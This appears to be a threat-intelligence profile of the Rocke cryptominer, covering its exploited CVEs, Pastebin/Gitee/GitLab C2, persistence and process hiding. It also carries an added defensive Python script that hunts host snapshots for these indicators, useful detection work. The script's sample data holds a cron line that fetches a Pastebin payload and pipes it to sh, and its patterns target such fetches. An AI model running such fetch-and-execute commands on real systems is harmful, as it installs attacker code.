Rocke
Rocke is a cryptomining malware family and threat activity cluster associated with compute hijacking on Linux and Windows systems. Reporting links Rocke to exploitation of public-facing applications, including Apache Struts, Oracle WebLogic via CVE-2017-10271, and Adobe ColdFusion via CVE-2017-3066, to deliver malware. Rocke used shell scripts and Python-based malware to install and spread coinminers, and also leveraged SSH and private keys present on infected machines to move laterally, including attempts to SSH to hosts found in known_hosts. Persistence mechanisms described include cron jobs, init.d startup scripts, systemd service scripts, and, on Windows, UPX-packed files placed in the Start Menu folder.
Rocke used Pastebin, Gitee, and GitLab as web-based command-and-control or payload-hosting infrastructure. It issued wget requests from infected systems to C2, executed wget and curl commands to Pastebin over HTTPS, and used Pastebin as a dead-drop resolver to check malware versions and redirect victims to updated payloads. Additional reported behaviors include downloading and extracting tar.gz payloads, compiling delivered .c files with GCC, and downloading libprocesshider. Rocke modified /etc/ld.so.preload to hook libc functions and hide the dropper and the mining software from process listings.
Defense evasion and anti-competition behaviors attributed to Rocke include scripts that detected and uninstalled antivirus software, killing processes, adding firewall rules to block competing cryptominers, clearing /var/log files, deleting files on infected machines, and changing file timestamps to hinder forensic analysis. The miner was also saved under the filename "java" to masquerade as legitimate software. Reporting further notes that Rocke can detect a running process's PID on an infected machine. Rocke scanned for exposed TCP port 7001 as well as SSH and Redis services. One cited network detail is that Rocke's miner connected over non-standard port 51640; on Windows, a miner component named TermsHost.exe injected into processes including Notepad.exe to evade defenses.
Indicators and references mentioned directly in the reporting include ClamAV detections such as "Unix.Downloader.Rocke" and "Unix.Downloader.Rocke-6826000-0," use of Pastebin/Gitee/GitLab for C2, and Rocke/KORKERDS artifacts such as /tmp/.x/kworker in a rival-miner context.
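As an added example (not Rocke's code and not part of the original page), the script below turns the host-visible behaviours described above into a small hunt over a snapshot of Linux host telemetry: entries in /etc/ld.so.preload (the libprocesshider hook), cron jobs that fetch from Pastebin, Gitee or GitLab, a process named "java" running from outside the usual JDK locations or from the /tmp/.x/kworker artifact path, and TCP connections to port 51640. The snapshot structure, the allow-list of directories where a real "java" binary is expected, and every sample value (hostnames, IPs, PIDs) are assumptions constructed for the example.

```python
"""Hunt for Rocke-style host indicators in a constructed host snapshot (added example)."""
import re
from dataclasses import dataclass

# Web services the reporting names as Rocke C2 / payload hosts.
DEAD_DROP_HOSTS = ("pastebin.com", "gitee.com", "gitlab.com")
# Non-standard port the reporting cites for the miner's connection.
MINER_PORT = 51640
# Assumed locations of a legitimate "java" binary; a "java" elsewhere is the masquerade.
JAVA_HOME_PREFIXES = ("/usr/lib/jvm/", "/usr/bin/", "/usr/local/", "/opt/")
# Artifact path named in the reporting (KORKERDS/Rocke rival-miner context).
KNOWN_BAD_PATHS = ("/tmp/.x/kworker",)


@dataclass
class HostSnapshot:
    ld_so_preload: str   # contents of /etc/ld.so.preload, "" if the file is absent
    cron_lines: list     # crontab lines collected from the host
    processes: list      # (pid, comm, exe_path) tuples
    connections: list    # (remote_ip, remote_port) tuples


# wget/curl followed, within the same shell command, by an http(s) URL.
_FETCH_RE = re.compile(r"\b(wget|curl)\b[^|;&]*?(https?://([\w.-]+))", re.I)


def check_ld_preload(content):
    """Any preload entry is worth a look; a processhider library is high confidence."""
    findings = []
    for line in content.splitlines():
        path = line.strip()
        if not path:
            continue
        level = "high" if "processhider" in path.lower() else "medium"
        findings.append((level, f"/etc/ld.so.preload loads {path}"))
    return findings


def check_cron(lines):
    """Flag cron commands that pull content from the dead-drop hosts."""
    findings = []
    for line in lines:
        if line.lstrip().startswith("#"):
            continue
        for m in _FETCH_RE.finditer(line):
            host = m.group(3).lower()
            if any(host == h or host.endswith("." + h) for h in DEAD_DROP_HOSTS):
                findings.append(("high", f"cron fetches from dead-drop host {host}: {line.strip()}"))
    return findings


def check_processes(procs):
    """Flag the known artifact path and a 'java' running from an unexpected location."""
    findings = []
    for pid, comm, exe in procs:
        if exe in KNOWN_BAD_PATHS:
            findings.append(("high", f"pid {pid} runs known artifact path {exe}"))
        elif comm == "java" and not exe.startswith(JAVA_HOME_PREFIXES):
            findings.append(("medium", f"pid {pid} named 'java' but runs from {exe}"))
    return findings


def check_connections(conns):
    """Flag connections to the miner port cited in the reporting."""
    return [("medium", f"connection to {ip}:{port} (miner port in reporting)")
            for ip, port in conns if port == MINER_PORT]


def hunt(snap):
    """Run every check; return (severity, message) tuples with high severity first."""
    findings = (check_ld_preload(snap.ld_so_preload) + check_cron(snap.cron_lines)
                + check_processes(snap.processes) + check_connections(snap.connections))
    order = {"high": 0, "medium": 1}
    return sorted(findings, key=lambda f: order[f[0]])


# Constructed sample snapshot (not real telemetry); hosts and IPs are placeholders.
SAMPLE = HostSnapshot(
    ld_so_preload="/usr/local/lib/libprocesshider.so\n",
    cron_lines=[
        "# m h dom mon dow command",
        "*/10 * * * * wget -q -O- https://pastebin.com/raw/EXAMPLE | sh",
        "0 3 * * * /usr/bin/certbot renew --quiet",
    ],
    processes=[
        (412, "sshd", "/usr/sbin/sshd"),
        (2187, "java", "/usr/lib/jvm/java-11-openjdk/bin/java"),
        (3051, "java", "/tmp/java"),
        (3060, "kworker", "/tmp/.x/kworker"),
    ],
    connections=[("192.0.2.10", 443), ("198.51.100.7", 51640)],
)

if __name__ == "__main__":
    for sev, msg in hunt(SAMPLE):
        print(f"[{sev:6}] {msg}")
```

On the sample snapshot the hunt returns five findings: the processhider preload, the Pastebin cron fetch and the /tmp/.x/kworker process as high, and the misplaced "java" plus the port 51640 connection as medium. The OpenJDK process and the certbot cron line are left alone, which is the point of the directory allow-list and the dead-drop host match.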
Vulnerabilities exploited
5 CVEs Mallory has correlated with this family across public research and vendor advisories.
Threat actors are continuing to exploit a critical Langflow vulnerability as part of fresh attacks designed to deliver a Monero cryptocurrency miner. The activity has been found to weaponize CVE-2026-33017 (CVSS score: 9.3), an unauthenticated remote code execution (RCE) vulnerability in Langflow, indicating threat actors are scanning and targeting exposed artificial intelligence (AI) application endpoints for obtaining initial access to enterprise networks.
Rocke exploited Apache Struts, Oracle WebLogic (CVE-2017-10271), and Adobe ColdFusion (CVE-2017-3066) vulnerabilities to deliver malware.
ClamAV signatures include "Unix.Downloader.Rocke" in the list of malware activity associated with ongoing exploitation campaigns.
The following analytic identifies remote code execution (RCE) attempts targeting F5 BIG-IP, BIG-IQ, and Traffix SDC devices, specifically exploiting CVE-2020-5902.
Techniques & procedures
7 distinct techniques documented for this family, organized by ATT&CK tactic.
Stealth
5 techniques
"Action RAT's commands, strings, and domains can be Base64 encoded within the payload." / "ADVSTORESHELL... strings... encrypted with an XOR-based algorithm; some strings are also encrypted with 3DES and reversed." / "APT29 has used encoded PowerShell commands." / "APT41 used VMProtected binaries..."
"Sandworm Team used UPX to pack a copy of Mimikatz"; "APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium"; "Lazarus Group packed malicious .db files with Themida to evade detection."
“DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files… actors used the following command to rename one of their tools to a benign file name: ren "%temp%\upload" audiodg.exe … has used legitimate names and locations for files to evade defenses.”
Discovery
2 techniques
"...used tasklist to enumerate processes..."; "...used the ps command to list processes..."; "...calling CreateToolhelp32Snapshot... to enumerate the running processes..."
"4H RAT sends an OS version identifier in its beacons"; "admin@338 actors used ... ver ... systeminfo"; "Bundlore will enumerate the macOS version ... using /usr/bin/sw_vers -productVersion"; "DarkTortilla ... querying ... WMI objects"; "Turla ... discover operating system configuration details using the systeminfo and set commands"
Recent activity
12 sources tracked across advisories, community write-ups, and news.
Referenced as a competing cryptomining malware family whose processes are terminated by lambsys.
A Linux cryptomining family/lineage referenced both as a rival family targeted by lambsys and as the most plausible technique lineage for the campaign, based on shared SSH worming and cleanup behaviors.
Unix downloader referenced via detection signatures as associated with malware activity seen during Log4j exploitation campaigns.
Linux/Unix downloader malware referenced via detection signatures as part of activity associated with Log4j exploitation campaigns.